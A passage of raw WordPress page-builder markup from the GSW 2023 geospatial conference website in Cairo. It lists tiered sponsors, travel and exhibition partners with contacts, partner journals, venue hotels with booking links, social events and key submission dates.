border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter 